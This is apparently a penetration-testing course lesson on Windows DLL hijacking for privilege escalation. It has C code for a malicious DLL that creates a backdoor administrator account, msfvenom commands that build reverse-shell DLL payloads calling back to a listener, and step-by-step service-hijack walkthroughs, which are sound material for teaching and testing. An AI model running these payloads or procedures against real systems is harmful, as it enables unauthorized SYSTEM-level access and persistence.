DLL Hijacking

intermediate35 minWriteup

Exploiting DLL search order for privilege escalation

Learning Objectives

  • Understand DLL search order
  • Find DLL hijacking opportunities
  • Create malicious DLLs
  • Exploit DLL hijacking

DLL Hijacking exploits the way Windows searches for Dynamic Link Libraries (DLLs). When an application loads a DLL, Windows searches specific directories in a defined order. If we can place a malicious DLL earlier in the search path, our code runs instead of the legitimate library.

Think of it like a road detour. The application expects to find its library at the usual location, but we've set up a fake "library" earlier on the route. The application picks up our fake, thinking it's the real thing.

Service vs Application DLL Hijacking

Hijacking a DLL loaded by a SYSTEM service = SYSTEM privileges. Hijacking a DLL loaded by a user application = that user's privileges. Focus on services for privilege escalation.

DLL Search Order

1Windows DLL Search Order (SafeDllSearchMode enabled):
21. Application's directory (where .exe lives)
32. System directory (C:WindowsSystem32)
43. 16-bit system directory (C:WindowsSystem)
54. Windows directory (C:Windows)
65. Current working directory
76. Directories in PATH environment variable
8 
9SafeDllSearchMode DISABLED (less common):
101. Application's directory
112. Current working directory     ← Moved earlier!
123. System directory
134. 16-bit system directory
145. Windows directory
156. PATH directories
16 
17Known DLLs (bypass search order):
18Some DLLs are pre-loaded and bypass this search
19Listed in: HKLMSYSTEMCurrentControlSetControlSession ManagerKnownDLLs

Why DLL Hijacking Works

1Vulnerable Conditions:
2├── Application tries to load a DLL
3├── DLL is NOT in KnownDLLs list
4├── One of these is true:
5│   ├── DLL doesn't exist (missing DLL)
6│   ├── Earlier search location is writable
7│   └── Application directory is writable
8└── We can place our DLL before the real one
9 
10Common Scenarios:
11├── Missing DLL (application expects DLL that was never installed)
12├── Phantom DLL (old software references removed DLLs)
13├── PATH hijacking (writable directory in PATH before System32)
14└── Application folder writable (third-party software)

Finding DLL Hijacking Opportunities

Using Process Monitor

1Process Monitor (procmon.exe) from Sysinternals:
21. Run as Administrator
32. Set filters:
4   - Operation: CreateFile
5   - Result: NAME NOT FOUND
6   - Path: ends with .dll
73. Start service or application
84. Watch for DLL load failures in writable locations
9 
10Filter configuration:
11├── Column: Operation
12├── Relation: is
13├── Value: CreateFile
14└── Action: Include
15 
16├── Column: Result
17├── Relation: is
18├── Value: NAME NOT FOUND
19└── Action: Include
20 
21├── Column: Path
22├── Relation: ends with
23├── Value: .dll
24└── Action: Include

Automated Discovery

powershell
1606070;"># Using PowerUp
2Import-Module PowerUp.ps1
3Find-ProcessDLLHijack
4Find-PathDLLHijack
5 
6606070;"># WinPEAS checks for DLL hijacking opportunities
7.winpeas.exe servicesinfo
8 
9606070;"># Check PATH for writable directories
10$env:PATH -split 606070;">#a5d6ff;">';' | ForEach-Object {
11    $path = $_
12    $acl = Get-Acl $path -ErrorAction SilentlyContinue
13    if ($acl) {
14        $acl.Access | Where-Object {
15            $_.FileSystemRights -match 606070;">#a5d6ff;">"Write|FullControl|Modify" -and
16            $_.IdentityReference -match 606070;">#a5d6ff;">"Users|Everyone|Authenticated"
17        } | ForEach-Object {
18            Write-Host 606070;">#a5d6ff;">"Writable: $path" -ForegroundColor Red
19        }
20    }
21}

Creating Malicious DLLs

c
1606070;">// Simple DLL that adds admin user when loaded
2606070;">// save as evil.c
3 
4606070;">#include <windows.h>
5 
6BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
7    if (fdwReason == DLL_PROCESS_ATTACH) {
8        system(606070;">#a5d6ff;">"net user hacker Password123! /add");
9        system(606070;">#a5d6ff;">"net localgroup Administrators hacker /add");
10    }
11    return TRUE;
12}
13 
14606070;">// Compile with MinGW (on Linux):
15606070;">// x86_64-w64-mingw32-gcc -shared -o evil.dll evil.c
16 
17606070;">// For 32-bit:
18606070;">// i686-w64-mingw32-gcc -shared -o evil.dll evil.c

Using msfvenom

bash
1606070;"># Generate DLL payload (reverse shell)
2msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f dll -o evil.dll
3 
4606070;"># For 32-bit targets
5msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f dll -o evil.dll
6 
7606070;"># Meterpreter version
8msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f dll -o evil.dll
9 
10606070;"># Add user (doesn't require listener)
11msfvenom -p windows/adduser USER=hacker PASS=Password123! -f dll -o evil.dll

Matching Exported Functions

c
1606070;">// Some DLLs need to export specific functions
2606070;">// Check what the application expects:
3606070;">// dumpbin /exports original.dll
4 
5606070;">// Example: Application expects MessageBoxA
6606070;">#include <windows.h>
7 
8606070;">// Export the expected function
9__declspec(dllexport) int MessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType) {
10    606070;">// Our malicious code runs first
11    system(606070;">#a5d6ff;">"net user hacker Password123! /add");
12 
13    606070;">// Optionally call the real function (for stealth)
14    606070;">// LoadLibrary("C:\Windows\System32\user32.dll");
15    606070;">// return real_MessageBoxA(...);
16 
17    return 0;
18}
19 
20BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
21    return TRUE;
22}

Export Matching

Some applications check for specific exported functions. If your DLL doesn't export what's expected, it may not load. Use dumpbin to see required exports.

Exploitation Examples

Missing DLL Hijacking

batch
1REM Scenario: Service tries to load missing.dll that doesn't exist
2REM Found via Process Monitor or WinPEAS
3 
4REM 1. Identify the location service looks for DLL
5REM Process Monitor shows:
6REM C:VulnAppmissing.dll - NAME NOT FOUND
7REM C:WindowsSystem32missing.dll - NAME NOT FOUND
8 
9REM 2. Check if C:VulnApp is writable
10icacls 606070;">#a5d6ff;">"C:VulnApp"
11REM BUILTINUsers:(M) - YES!
12 
13REM 3. Create malicious DLL
14msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f dll -o missing.dll
15 
16REM 4. Place in vulnerable location
17copy missing.dll 606070;">#a5d6ff;">"C:VulnAppmissing.dll"
18 
19REM 5. Start listener
20nc -lvnp 4444
21 
22REM 6. Restart service (or wait for it to restart)
23sc stop VulnService
24sc start VulnService
25 
26REM 7. Catch SYSTEM shell!

PATH DLL Hijacking

batch
1REM Scenario: Writable directory in PATH before System32
2 
3REM 1. Check PATH
4echo %PATH%
5REM C:Python;C:WindowsSystem32;...
6 
7REM 2. Check if C:Python is writable
8icacls C:Python
9REM BUILTINUsers:(M) - YES!
10 
11REM 3. Find DLLs that applications load from PATH
12REM Use Process Monitor or check common DLLs
13 
14REM 4. Create malicious DLL with common name
15msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f dll -o version.dll
16 
17REM 5. Place in writable PATH directory
18copy version.dll C:Pythonersion.dll
19 
20REM 6. Wait for an application to load it
21REM (Many apps load version.dll)

Commonly Hijacked DLLs

1Commonly Hijacked DLLs:
2├── wlbsctrl.dll      ← Used by IKEEXT service
3├── wow64log.dll      ← Often missing, loaded by many processes
4├── oci.dll           ← Oracle client
5├── WTSAPI32.dll      ← Terminal services
6├── dwmapi.dll        ← Desktop Window Manager
7├── version.dll       ← Many applications
8├── userenv.dll       ← User environment
9├── faultrep.dll      ← Windows Error Reporting
10├── dbghelp.dll       ← Debugging helper
11└── dbgcore.dll       ← Debugging core
12 
13Finding Your Own Targets:
141. Run Process Monitor
152. Filter for NAME NOT FOUND + .dll
163. Restart various services
174. Note which DLLs are missing from writable locations
185. Target services running as SYSTEM

DLL Hijacking Methodology

DLL Hijacking Attack Flow

1
MonitorUse Process Monitor to find missing DLLs
2
IdentifyFind DLLs searched in writable locations
3
VerifyConfirm directory is writable (icacls)
4
Check ServiceVerify service runs as SYSTEM
5
Create DLLGenerate malicious DLL with msfvenom
6
PlaceCopy DLL to writable location
7
TriggerRestart service or wait for load

Knowledge Check

Quick Quiz
Question 1 of 3

What is the first location Windows checks for a DLL (with SafeDllSearchMode enabled)?

Challenges

DLL Hijack Attack

Challenge
💀 advanced

Find a DLL hijacking opportunity on a Windows system and exploit it to gain elevated privileges.

Need a hint? (4 available)

Key Takeaways

  • Windows searches for DLLs in a specific order
  • If we can write to a directory earlier in the order, we win
  • Process Monitor reveals DLL loading behavior
  • Filter for NAME NOT FOUND in writable locations
  • Target services running as SYSTEM for privilege escalation
  • May need to export specific functions to match expectations